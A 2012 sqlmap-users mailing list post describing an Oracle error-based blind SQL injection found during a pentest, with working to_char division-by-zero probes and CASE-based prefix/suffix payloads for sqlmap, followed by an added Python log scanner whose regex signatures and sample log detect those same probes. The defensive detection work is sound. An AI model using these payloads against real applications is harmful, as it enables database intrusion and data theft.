[sqlmap-users] Add a new Injection-Type to sqlmap?
From: whp <wh...@po...> - 2012-07-26 09:27:00
Hi list/developer,

I stumbled over this type of injection while doing a pentest and thought of implementing this kind of injection in sqlmap (I call it "error-based-blind-injection"):

The webapp replied with "success" if the statement was correct, regardless of the number of returned rows (the rows actually were fetched in a subsequent request), and with an empty response if the statement failed.

So the attack was identified the following way (it is an Oracle DB):

    param=' and to_char(1/0) like '1    --> empty response, because 1/0 is a division by zero error
    param=' and to_char(1/1) like '1    --> success

Now I had to find a workaround to get sqlmap to identify this injection (it only identified a time-based blind, but I wanted a _fast_ attack).

My solution:

    prefix= ' and to_char(1/(case (select 'a' from dual where 1=1
    suffix= ) when 'a' then '1' else '0' end)) like '1

Now my question: is it possible to get this attack into sqlmap as a standard attack, or is there an easier way to configure sqlmap?

Additionally, the Oracle "order by" clause injection via a case statement would be interesting.

Your opinions/suggestions?

Chris
--
whp_at_pohlcity_dot_de
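Added example for the detection side of the probes Chris describes (this is not code from the post or from sqlmap): it scans combined-format access-log lines for the to_char() division-by-zero probe, the CASE-wrapped prefix/suffix form and the SELECT ... FROM DUAL inside it, and flags the "200 with empty body" reply that the post identifies as the failed-statement outcome. The log lines, host and path are constructed for the example, and the signature names are mine.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Combined-log-format line: client, timestamp, request line, status, body size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$')

# Signatures for the Oracle probes in the post: to_char() wrapping an integer
# division, the forced 1/0, the CASE-wrapped variant used as sqlmap prefix/suffix,
# and the SELECT ... FROM DUAL subselect inside it. Names are my own.
SIGNATURES = [
    ("to_char-division", re.compile(r"to_char\s*\(\s*\d+\s*/", re.I)),
    ("division-by-zero", re.compile(r"to_char\s*\(\s*\d+\s*/\s*0\s*\)", re.I)),
    ("case-wrapped-division",
     re.compile(r"to_char\s*\(\s*\d+\s*/\s*\(\s*case\b.*\bend\s*\)\s*\)", re.I | re.S)),
    ("dual-subselect", re.compile(r"\bselect\b.+?\bfrom\s+dual\b", re.I | re.S)),
]

def scan_line(line):
    """Return [(parameter, signature), ...] for one access-log line ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    # parse_qsl percent-decodes, so %2F0 and %28case are seen as '/0' and '(case'.
    for name, value in parse_qsl(urlsplit(m.group("uri")).query, keep_blank_values=True):
        hits += [(name, sig) for sig, rx in SIGNATURES if rx.search(value)]
    return hits

def probe_errored(line):
    """True for a 200 with an empty body: the 'statement failed' reply the post describes."""
    m = LOG_RE.match(line)
    return bool(m) and m.group("status") == "200" and m.group("size") in ("0", "-")

def scan_log(text):
    """Map each flagged 1-based line number to (hits, errored)."""
    out = {}
    for i, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            out[i] = (hits, probe_errored(line))
    return out

# Constructed sample log (hypothetical host and path); the query strings carry the
# probes from the post, percent-encoded as a client would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jul/2012:09:27:00 +0200] "GET /app/search?param=abc HTTP/1.1" 200 512
10.0.0.5 - - [26/Jul/2012:09:27:01 +0200] "GET /app/search?param=%27%20and%20to_char%281%2F0%29%20like%20%271 HTTP/1.1" 200 0
10.0.0.5 - - [26/Jul/2012:09:27:02 +0200] "GET /app/search?param=%27%20and%20to_char%281%2F1%29%20like%20%271 HTTP/1.1" 200 512
10.0.0.5 - - [26/Jul/2012:09:27:03 +0200] "GET /app/search?param=%27%20and%20to_char%281%2F%28case%20%28select%20%27a%27%20from%20dual%20where%201%3D1%29%20when%20%27a%27%20then%20%271%27%20else%20%270%27%20end%29%29%20like%20%271 HTTP/1.1" 200 512
"""
```

Note that the true-condition probe (to_char(1/1)) only trips the broad "to_char-division" signature, which is why pairing signature hits with the empty-body outcome across successive requests from one client is what makes the boolean oracle visible in logs.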